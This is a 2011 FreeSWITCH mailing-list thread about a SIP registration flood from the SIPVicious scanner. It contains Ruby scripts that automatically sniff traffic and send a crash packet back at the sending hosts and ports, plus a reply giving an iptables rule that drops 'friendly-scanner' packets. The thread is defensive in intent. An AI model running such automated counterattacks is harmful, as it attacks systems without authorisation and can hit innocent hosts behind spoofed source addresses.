[Freeswitch-users] SPIT attack and how to strike back

Brian West brian at freeswitch.org
Thu Apr 21 05:22:44 MSD 2011 

Or 

iptables -I INPUT -j DROP -p udp --dport 5060 -m string --string "friendly-scanner" --algo bm

/b

On Apr 20, 2011, at 6:00 PM, Peter P GMX wrote:

> Hello all,
> 
> I would like to share this with you as you may have also been affected
> by this threat.
> 
> Yesterday we received a SPIT attack to our Freeswitch servers. We had
> about 50 register requests/sec. We noticed this as we saw a slight
> increase in the load of the Freeswitch servers. Fortunately Freeswitch
> can handle a huge amount of register requests so we had no denial of
> service.
> 
> You can identify this attack by finding the following in the Register
> message:
>    User-Agent: friendly-scanner
> 
> How to get rid of it:
> The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a
> nice tool "svcrash.py" wich can send a malformed packet back to the
> attacker which crashes their own Sipvicious tool. You can issue this tool by
>  python svcrash.py -d <host of attacker> -p <port of attacker>
> You will need port 5060 on your machine to work. But there is also a
> workaround for that. svcrash.py will show how to overcome this if your
> port 5060 is not available.
> Download it here
> http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz and
> unpack it to a folder of your choice.
> 
> I wrote a small Ruby script to send the packet back to a port range, as
> our attacker used some dozens of ports to send.
> Here is the script (Install ruby first by "apt-get install ruby" e.g. on
> Debian based systems). Put it into the sipvicious directory
> kill_ports.rb:
> 
> #!/usr/bin/env ruby
> host=ARGV[0]
> start_port=ARGV[1].to_i
> end_port=ARGV[2].to_i
> start_port.upto(end_port) do |port|
>  cmd="python svcrash.py -d #{host} -p #{port}"
>  p cmd
>  erg=`#{cmd}`
>  p erg
> end
> 
> You now can run it by
> ./kill_ports.rb <ip> <from_port> <to_port>
> 
> By using this tool we got rid of most of the SPIT messages. But after a
> while they started again to attack us from different ports.
> 
> The next step is: Why not automate this by trying to identify host and
> port automatically and send back the svcrash.py packet to the sender's port?
> 
> First install the pcap library
>    apt-get install libpcap-dev libpcap-ruby
> 
> Then I wrote the following tool to automate this, it makes use of the
> kill_ports.rb above:
> strike_back.rb:
> 
> #!/usr/bin/env ruby
> # I used some code from http://snippets.dzone.com/posts/show/5931
> require 'pcaplet'
> require 'logger'
> require 'timeout'
> @timeout=3600 # max runtime: 1 hour
> 
> @logfile='strike_back.log'
> class AuditLogger < Logger
>  def format_message(severity, timestamp, progname, msg)
>    puts msg
>    "#{msg}\n"
>  end
> end
> 
> logfile = File.open(@logfile, 'a')
> LOGGER = AuditLogger.new(logfile)
> LOGGER.level = Logger::INFO
> search="friendly-scanner"
> puts"Searching for '#{ search}' in SIP packets"
> $network = Pcaplet.new('-s 1500')
> $filter = Pcap::Filter.new('udp and dst port 5060', $network.capture)
> $network.add_filter($filter)
> puts "Logfile: #{@logfile}"
> puts "Starting capture..."
> begin
>  Timeout.timeout(@timeout) do # 3600 sec
>    for p in $network
>        header= "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")}
> #{p.src}:#{p.sport} => #{p.dst}:#{p.dport}"
>        if $filter =~ p
>            #puts "simple search"
>            if p.udp_data.index(search)
>              LOGGER.info "Kill Friendly scanner #{p.src} with Source
> Port #{p.sport}"
>              cmd="./kill_ports.rb #{p.src} #{p.sport} #{p.sport}"
>              erg=`#{cmd}`
>              p erg
>              LOGGER.info header
>              LOGGER.info p.udp_data
>            end
>        end
>    end
>  end
> rescue Timeout::Error
>  logfile.flush
>  puts "Timeout - finished."
> end
> 
> There may be a better way to code this, but at least it worked. After
> about 15min the number of attacks went to 0.
> 
> Disclaimer: You can damage other systems by using these tools. So be
> carefull and use at your own risks. Do not use this tool for attacking
> other systems!
> 
> Best regards
> Peter
> 
> _______________________________________________
> FreeSWITCH-users mailing list
> FreeSWITCH-users at lists.freeswitch.org
> http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
> UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
> http://www.freeswitch.org

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.freeswitch.org/pipermail/freeswitch-users/attachments/20110420/440b521f/attachment.html

More information about the FreeSWITCH-users mailing list